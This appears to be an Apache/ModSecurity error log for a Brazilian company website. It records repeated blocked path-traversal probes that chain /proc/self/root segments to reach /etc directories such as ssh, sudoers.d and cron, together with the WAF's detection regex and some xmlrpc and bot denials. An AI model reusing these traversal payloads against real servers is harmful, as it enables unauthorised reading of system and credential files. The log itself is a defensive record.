[Wed Mar 18 11:40:39.708583 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:45670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5ZymAPhZkrhU8w4l2-QAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:40.738835 2026] [access_compat:error] [pid 15826:tid 140411641214720] [client 5.254.106.5:29647] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:40:40.997634 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:45472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5aCmAPhZkrhU8w4l2-gAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:42.383927 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:45486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5ata6ubjKNq_cu4alOAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:48.664524 2026] [access_compat:error] [pid 31803:tid 140411624429312] [client 158.173.155.195:36163] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:40:48.995225 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:45488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5cCmAPhZkrhU8w4l3AAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:50.332698 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:37144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5ctY0UrI5A3LftIy49gAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:53.368574 2026] [access_compat:error] [pid 26799:tid 140411548894976] [client 51.210.104.160:41849] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:40:53.858507 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.243.128:37152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5dSmAPhZkrhU8w4l3AwAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:55.173517 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:37162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5d-w_le52K8_3pV3pVgAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:40:58.652581 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:37178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5esdf6f5d65gmYZTe4gAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:41:07.299988 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:45142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5gtY0UrI5A3LftIy4_wAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:41:13.289382 2026] [mime_magic:error] [pid 30077:tid 140411716749056] (70014)End of file found: [client 57.141.18.98:57822] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:41:18.369931 2026] [mime_magic:error] [pid 17887:tid 140411616036608] (70014)End of file found: [client 57.141.18.30:57956] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:41:44.723815 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:35178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5qEzinOy1jxa1j4cfoQAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:41:58.483924 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:45150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5tuyqAr6etmhZHNrMaQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:42:03.452432 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:55678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5u8df6f5d65gmYZTfCQAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:42:10.193281 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:55684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5wta6ubjKNq_cu4alhQAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:42:12.813856 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:56746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5xEzinOy1jxa1j4cfvgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:42:17.411484 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:56762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5yfu8EFLIOrSqIpsNawAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:42:40.234660 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:55794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq54EzinOy1jxa1j4cf5AAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:42:43.615771 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:56772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq54-yqAr6etmhZHNrMnAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:43:05.561458 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 57.141.18.93:33004] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:43:09.111004 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:34502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq5_UzinOy1jxa1j4cgDQAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Wed Mar 18 11:43:26.014162 2026] [mime_magic:error] [pid 11816:tid 140411565680384] (70014)End of file found: [client 57.141.18.28:33612] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:43:28.008206 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:41930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq6D-oXxyEfFpUF8f93VAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:43:49.386829 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.228.61:33578] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq6JeoXxyEfFpUF8f93XAAAAUs"]
[Wed Mar 18 11:43:49.538960 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.244.43:49922] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq6Jcdf6f5d65gmYZTfPQAAAtI"]
[Wed Mar 18 11:44:13.764964 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:56096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 